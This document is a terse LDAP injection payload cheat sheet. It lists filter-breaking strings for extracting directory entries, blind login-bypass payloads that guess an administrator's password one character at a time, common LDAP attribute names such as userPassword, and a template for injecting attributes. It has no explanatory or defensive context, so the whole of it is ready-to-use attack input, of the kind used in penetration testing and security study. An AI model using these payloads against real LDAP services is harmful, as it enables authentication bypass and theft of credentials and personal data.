LDAP Injection (ldapi)



Payloads (Extraction)
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y


Payloads (Blind, login bypass)
(&(sn=administrator)(password=*))
(&(sn=administrator)(password=A*))
(&(sn=administrator)(password=B*))
(&(sn=administrator)(password=AB*))
etc...&c...


Defulat attributes
userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName
	inject attributes with syntax
*)(ATTRIBUTE=*

